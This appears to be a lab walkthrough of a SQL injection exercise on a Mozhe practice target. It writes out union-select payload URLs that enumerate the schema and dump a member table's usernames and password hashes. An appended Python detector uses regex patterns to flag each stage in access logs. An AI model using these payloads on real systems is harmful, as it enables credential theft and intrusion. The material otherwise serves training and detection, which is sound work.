Mozhe Study Notes
By/shy014
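Address: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
1. Log in to the Mozhe range, select this target machine, and start it
2. Enter the target and find the familiar notice
3. Testing shows a SQL injection vulnerability exists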
http://219.153.49.228:45391/new_list.php?id=1%20and%201=2
4. Determine the number of columns
http://219.153.49.228:45391/new_list.php?id=1%20order%20by%204
5. Determine which positions are echoed back in the page
http://219.153.49.228:45391/new_list.php?id=-1%20union%20select%201,2,3,4
6. Determine the current user name and database
http://219.153.49.228:45391/new_list.php?id=-1%20union%20select%201,database(),user(),4
7. Read the database names
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--+
8. Read the table names
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='sys'--+
This is not the table we are looking for
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'--+
9. Read the column names
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'--+
10. Read the contents
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(id,name,password,status),3,4 from StormGroup_member--+
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(id,name,password),3,4 from StormGroup_member--+
11. Decrypt the MD5 value
12. Log in and obtain the key
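
Seen from the server side, steps 3 to 10 leave a recognisable sequence in the access log for new_list.php. The following is an added example, not part of the original walkthrough: a small detector that decodes the id parameter and labels which stage of the sequence each request matches. The log line format, the client IPs and the names classify and scan are assumptions made for the example.

```python
import re
from collections import OrderedDict
from urllib.parse import urlsplit, parse_qs

# Stage patterns, in the order the walkthrough's requests use them.
STAGES = [
    ("boolean_test", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(schemata|tables|columns)\b", re.I)),
    ("data_dump", re.compile(r"\bgroup_concat\s*\(", re.I)),
]
REQUEST = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (client IP, request line, status); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 "GET /new_list.php?id=1 HTTP/1.1" 200',
    '203.0.113.7 "GET /new_list.php?id=1%20and%201=2 HTTP/1.1" 200',
    '203.0.113.7 "GET /new_list.php?id=1%20order%20by%204 HTTP/1.1" 200',
    '203.0.113.7 "GET /new_list.php?id=-1%20union%20select%201,2,3,4 HTTP/1.1" 200',
    '203.0.113.7 "GET /new_list.php?id=-1%20union%20select%201,group_concat(table_name),3,4'
    '%20from%20information_schema.tables--+ HTTP/1.1" 200',
    '198.51.100.9 "GET /new_list.php?id=2 HTTP/1.1" 200',
]

def classify(request_target, param="id"):
    """Return the stage names matched by the URL-decoded value of `param`."""
    values = parse_qs(urlsplit(request_target).query, keep_blank_values=True).get(param, [])
    hits = []
    for value in values:
        # A plain integer is the only legitimate shape for this parameter.
        if re.fullmatch(r"-?\d+", value.strip()):
            continue
        hits.append("non_integer_id")
        hits.extend(name for name, rx in STAGES if rx.search(value))
    return hits

def scan(lines):
    """Map each client IP to the stages it triggered, in first-seen order."""
    seen = OrderedDict()
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        for stage in classify(m.group(2)):
            stages = seen.setdefault(m.group(1), [])
            if stage not in stages:
                stages.append(stage)
    return dict(seen)

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, " -> ".join(stages))
```

A client that progresses from boolean_test through schema_enum within a short window is a much stronger signal than any single match, and the non_integer_id check alone is the validation the id parameter was missing.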